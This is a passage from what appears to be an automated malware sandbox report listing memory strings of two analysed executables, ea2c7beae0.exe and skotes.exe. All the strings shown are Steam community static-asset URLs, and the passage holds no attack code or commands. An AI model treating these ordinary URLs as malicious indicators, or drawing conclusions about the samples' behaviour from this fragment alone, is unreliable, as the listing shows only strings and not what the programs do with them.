0000000D.00000002.2680934463.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/css/skin_1/header.css?v=pTvrRy1pm52p&l=english
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587419706.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587737359.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
Source: ea2c7beae0.exe, 0000000B.00000003.2587419706.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587737359.0000000000A90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/css/skin_1/pr
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/css/skin_1/profilev2.css?v=t9xiI4DlPpEB&l=english
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443518589.0000000001038000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764879764.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443518589.0000000001038000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.000000000168D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680736225.000000000168D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680934463.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764879764.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: ea2c7beae0.exe, 0000000B.00000003.2620311804.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2664262344.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2813085979.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2623251409.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2866526265.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2640348018.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2684577632.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2641351631.0000000000A48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/javas
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443518589.0000000001038000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764879764.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/libraries~b28b7af69.js?v=
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443518589.0000000001038000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.000000000168D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680736225.000000000168D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680934463.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764879764.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/main.js?v=4XouecKy8sZy&am
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443518589.0000000001038000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.000000000168D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680736225.000000000168D000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680934463.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764879764.00000000007CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/manifest.js?v=r7a4-LYcQOj
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587419706.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587737359.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/javascript/global.js?v=7qlUmHSJhPRN&l=english
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587419706.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587737359.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587419706.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587737359.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/javascript/modalContent.js?v=XpCpvP7feUoO&l=english
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587419706.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587737359.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587419706.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587737359.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/javascript/profile.js?v=bbs9uq0gqJ-H&l=english
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587419706.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587737359.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/javascript/promo/stickers.js?v=W8NP8aTVqtms&l=english
Source: ea2c7beae0.exe, 0000000B.00000003.2587419706.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587737359.0000000000A90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t4
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587419706.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680736225.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680934463.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587419706.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587737359.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=english
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587419706.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587737359.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL&l=
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587419706.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587737359.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/javascript/webui/clientcom.js?v=jq1jQyX1843y&l=english
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587419706.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587737359.0000000000A90000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680736225.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680934463.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/shared/css/buttons.css?v=-WV9f1LdxEjq&l=english
Source: ea2c7beae0.exe, 0000000B.00000003.2587419706.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587737359.0000000000A90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/shared/css/motiva_Fvp
Source: ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/shared/css/motiva_sans.css?v=v7XTmVzbLV33&l=english
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680736225.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680934463.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/shared/css/shared_global.css?v=uF6G1wyNU-4c&l=english
Source: ea2c7beae0.exe, 0000000B.00000003.2587419706.0000000000A8D000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587737359.0000000000A90000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/shared/css/shared_responsive.css?v=kR7y
Source: ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668673015.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680736225.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668339801.00000000016AA000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000002.2680934463.00000000016F0000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/shared/css/shared_responsive.css?v=kR9MtmbWSZEp&l=engli
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: ea2c7beae0.exe, 00000007.00000003.2451885137.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000007.00000003.2443425929.00000000010CD000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587713979.0000000000A99000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 0000000B.00000003.2587387508.0000000000A95000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 0000000D.00000003.2668287945.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, ea2c7beae0.exe, 00000010.00000003.2764841551.0000000000832000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
